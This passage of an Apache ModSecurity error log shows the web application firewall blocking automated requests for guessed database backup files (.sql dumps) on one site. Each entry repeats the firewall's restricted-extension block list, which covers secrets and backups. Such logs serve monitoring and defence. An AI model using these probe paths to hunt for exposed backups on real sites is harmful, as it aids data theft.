.sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2023-stigacionperu.sql"] [unique_id "ZoqxX3ug2jzbr_AlO3dxzAAAANM"] [Sun Jul 07 10:16:48.597963 2024] [:error] [pid 31926:tid 139722483472128] [client 109.70.100.71:33364] [client 109.70.100.71] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/stigacionperu-2022.sql"] [unique_id "ZoqxYHug2jzbr_AlO3dxzQAAANY"] [Sun Jul 07 10:16:49.055757 2024] [:error] [pid 30826:tid 139722533828352] [client 185.220.101.32:33366] [client 185.220.101.32] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/db_mysql.sql"] [unique_id "ZoqxYfcO2IzqYGkif72oYwAAABA"] [Sun Jul 07 10:16:49.445222 2024] [:error] [pid 30827:tid 139722609362688] [client 185.220.101.32:33368] [client 185.220.101.32] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2023-cionperu.sql"] [unique_id "ZoqxYUGuaLybMBNkB61tXgAAAEc"] [Sun Jul 07 10:16:52.013973 2024] [:error] [pid 30827:tid 139722592577280] [client 185.220.101.32:33370] [client 185.220.101.32] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2022_cionperu.sql"] [unique_id "ZoqxZEGuaLybMBNkB61tXwAAAEk"] [Sun Jul 07 10:16:52.366593 2024] [:error] [pid 31926:tid 139722517042944] [client 38.152.53.243:33372] [client 38.152.53.243] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/backup_example.sql"] [unique_id "ZoqxZHug2jzbr_AlO3dxzgAAANI"] [Sun Jul 07 10:16:52.730185 2024] [:error] [pid 30826:tid 139722626148096] [client 38.152.53.243:33374] [client 38.152.53.243] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/estigacionperu-2022.sql"] [unique_id "ZoqxZPcO2IzqYGkif72oZAAAAAU"] [Sun Jul 07 10:16:53.053628 2024] [:error] [pid 30826:tid 139722525435648] [client 38.152.53.243:33376] [client 38.152.53.243] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/cionperu-2023.sql"] [unique_id "ZoqxZfcO2IzqYGkif72oZQAAABE"] [Sun Jul 07 10:16:53.371114 2024] [:error] [pid 30826:tid 139722466686720] [client 38.152.53.243:33378] [client 38.152.53.243] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/sql_backup.sql"] [unique_id "ZoqxZfcO2IzqYGkif72oZgAAABg"] [Sun Jul 07 10:16:54.656267 2024] [:error] [pid 30826:tid 139722517042944] [client 38.152.53.243:33380] [client 38.152.53.243] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2022-tigacionperu.sql"] [unique_id "ZoqxZvcO2IzqYGkif72oZwAAABI"] [Sun Jul 07 10:16:55.161427 2024] [:error] [pid 30826:tid 139722475079424] [client 38.152.53.243:33382] [client 38.152.53.243] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-content/database.sql"] [unique_id "ZoqxZ_cO2IzqYGkif72oaAAAABc"] [Sun Jul 07 10:16:55.505124 2024] [:error] [pid 30826:tid 139722584184576] [client 38.152.53.243:33384] [client 38.152.53.243] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2022_stigacionperu.sql"] [unique_id "ZoqxZ_cO2IzqYGkif72oaQAAAAo"] [Sun Jul 07 10:16:55.946145 2024] [:error] [pid 31926:tid 139722500257536] [client 38.152.53.243:33386] [client 38.152.53.243] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/db_backup_file.sql"] [unique_id "ZoqxZ3ug2jzbr_AlO3dxzwAAANQ"] [Sun Jul 07 10:16:56.313861 2024] [:error] [pid 30826:tid 139722567399168] [client 38.152.53.243:33388] [client 38.152.53.243] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/igacionperu-2022.sql"] [unique_id "ZoqxaPcO2IzqYGkif72oagAAAAw"] [Sun Jul 07 10:16:56.652244 2024] [:error] [pid 31926:tid 139722626148096] [client 38.152.53.243:33390] [client 38.152.53.243] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/u-2023.sql"] [unique_id "ZoqxaHug2jzbr_AlO3dx0AAAAMU"] [Sun Jul 07 10:16:57.005574 2024] [:error] [pid 31926:tid 139722609362688] [client 38.152.53.243:33392] [client 38.152.53.243] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/df_main.sql"] [unique_id "ZoqxaXug2jzbr_AlO3dx0QAAAMc"] [Sun Jul 07 10:16:57.809643 2024] [:error] [pid 30827:tid 139722642933504] [client 195.176.3.24:33394] [client 195.176.3.24] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/estigacionperu-2023.sql"] [unique_id "ZoqxaUGuaLybMBNkB61tYAAAAEM"] [Sun Jul 07 10:16:58.919492 2024] [:error] [pid 30827:tid 139722500257536] [client 195.176.3.24:33396] [client 195.176.3.24] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/2022-eru.sql"] [unique_id "ZoqxakGuaLybMBNkB61tYQAAAFQ"] [Sun Jul 07 10:16:59.843588 2024] [:error] [pid 30827:tid 139722567399168] [client 195.176.3.24:33398] [client 195.176.3.24] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/backup_test.sql"] [unique_id "Zoqxa0GuaLybMBNkB61tYgAAAEw"] [Sun Jul 07 10:17:00.646672 2024] [:error] [pid 30827:tid 139722634540800] [client 195.176.3.24:33400] [client 195.176.3.24] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/uploads/database.sql"] [unique_id "ZoqxbEGuaLybMBNkB61tYwAAAEQ"] [Sun Jul 07 10:17:02.669228 2024] [:error] [pid 30827:tid 139722533828352] [client 45.79.66.123:33402] [client 45.79.66.123] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/backup_bak.sql"] [unique_id "ZoqxbkGuaLybMBNkB61tZAAAAFA"] [Sun Jul 07 10:17:03.406608 2024] [:error] [pid 30826:tid 139722651326208] [client 45.79.66.123:33404] [client 45.79.66.123] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/backup_temp1.sql"] [unique_id "Zoqxb_cO2IzqYGkif72oawAAAAI"] [Sun Jul 07 10:17:04.110659 2024] [:error] [pid 30826:tid 139722617755392] [client 45.79.66.123:33406] [client 45.79.66.123] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/clients.sql"] [unique_id "ZoqxcPcO2IzqYGkif72obAAAAAY"] [Sun Jul 07 10:17:04.796385 2024] [:error] [pid 30826:tid 139722600969984] [client 45.79.66.123:33408] [client 45.79.66.123] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ 